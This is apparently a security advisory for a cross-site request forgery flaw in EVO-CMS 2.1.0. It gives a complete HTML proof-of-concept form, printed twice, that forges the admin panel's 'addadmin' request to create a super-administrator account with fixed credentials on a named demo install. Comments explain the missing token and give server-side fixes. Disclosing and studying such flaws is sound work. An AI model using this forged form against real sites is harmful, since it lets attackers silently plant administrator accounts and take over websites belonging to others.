# Affected software:  evo cms
# Type of vulnerability: adding new admin (csrf)
# URL: http://www.evo-german.com/
# Discovered by: Provensec
# Website: http://www.provensec.com
# Version: EVO-CMS 2.1.0
# Proof of concept

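An attacker can add a new admin account because the "addadmin" request to admin.php has no protection against CSRF. The request carries no anti-CSRF token, so a form hosted on another site is accepted when it is submitted from the browser of an administrator who is logged in.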


poc

<!--
  Proof-of-concept page for the missing CSRF check in the EVO-CMS admin panel.
  It is a static cross-site form that reproduces the "create administrator"
  request. Every field is a fixed value; none is a per-session or per-request
  token, which is why the page says the request can be forged.

  The field names are HTML-entity encoded: &#91; is "[", &#95; is "_" and
  &#93; is "]", so "authors&#91;add&#95;name&#93;" is sent as authors[add_name].

  Defender notes:
  - Fix on the server: require an unpredictable, session-bound token on
    state-changing admin requests and reject any request that lacks it.
    SameSite session cookies and re-authentication before creating an
    administrator are useful additional layers.
  - Review: check the administrator list for accounts nobody created on
    purpose, and look for POSTs to admin.php with op=addadmin whose
    Origin/Referer is not the site itself.
-->
<html>

  <body>
    <!-- Target is the admin endpoint of the public demo install named in the advisory. -->
    <form action="http://demo.opensourcecms.com/evocms/admin.php" method="POST">
      <!-- Display name and login id (aid) of the account being created. -->
      <input type="hidden" name="authors&#91;add&#95;name&#93;" value="test" />
      <input type="hidden" name="authors&#91;add&#95;aid&#93;"
value="test123" />
      <!-- &#64; is "@" and &#46; is "." in the e-mail value. -->
      <input type="hidden" name="authors&#91;add&#95;email&#93;"
value="test&#64;gmail&#46;com" />
      <input type="hidden" name="authors&#91;add&#95;url&#93;"
value="http://demo.opensourcecms.com/evocms/" />
      <input type="hidden" name="authors&#91;add&#95;admlanguage&#93;"
value="english" />
      <!-- radminsuper=1: presumably the super-administrator flag; confirm against the CMS source. -->
      <input type="hidden" name="authors&#91;add&#95;radminsuper&#93;"
value="1" />
      <!-- Password and its confirmation are supplied by the form, not by the logged-in administrator. -->
      <input type="hidden" name="authors&#91;add&#95;pwd&#93;"
value="test123" />
      <input type="hidden" name="authors&#91;add&#95;pwd2&#93;"
value="test123" />
      <!-- op/module select the "add administrator" action of the authors module. -->
      <input type="hidden" name="op" value="addadmin" />
      <input type="hidden" name="module" value="authors" />
      <!-- &#32; is a space: the value mirrors the label of the real admin form's button. -->
      <input type="hidden" name="submit" value="Create&#32;Administrator" />
      <!-- No token field appears anywhere above; that absence is the vulnerability. -->
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>











poc:

<!--
  Second copy of the proof-of-concept form; its fields and values match the
  listing earlier on this page. It reproduces the EVO-CMS "create
  administrator" POST using only fixed values. The request contains no
  anti-CSRF token, so the server has no means of telling a forged submission
  from one made through its own admin form.

  Entity decoding for the names: &#91; = "[", &#95; = "_", &#93; = "]".

  Remediation belongs on the server: validate a session-bound token on this
  action (and other state-changing admin actions) and reject requests
  without it.
-->
<html>

  <body>
    <!-- Cross-site POST to the admin endpoint of the demo install. -->
    <form action="http://demo.opensourcecms.com/evocms/admin.php" method="POST">
      <!-- Account details for the administrator to be created. -->
      <input type="hidden" name="authors&#91;add&#95;name&#93;" value="test" />
      <input type="hidden" name="authors&#91;add&#95;aid&#93;"
value="test123" />
      <input type="hidden" name="authors&#91;add&#95;email&#93;"
value="test&#64;gmail&#46;com" />
      <input type="hidden" name="authors&#91;add&#95;url&#93;"
value="http://demo.opensourcecms.com/evocms/" />
      <input type="hidden" name="authors&#91;add&#95;admlanguage&#93;"
value="english" />
      <!-- Presumably marks the new account as super administrator; verify in the CMS. -->
      <input type="hidden" name="authors&#91;add&#95;radminsuper&#93;"
value="1" />
      <input type="hidden" name="authors&#91;add&#95;pwd&#93;"
value="test123" />
      <input type="hidden" name="authors&#91;add&#95;pwd2&#93;"
value="test123" />
      <!-- Action selector: authors module, addadmin operation. -->
      <input type="hidden" name="op" value="addadmin" />
      <input type="hidden" name="module" value="authors" />
      <input type="hidden" name="submit" value="Create&#32;Administrator" />
      <!-- The complete parameter set ends here, with no token or nonce among the fields. -->
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>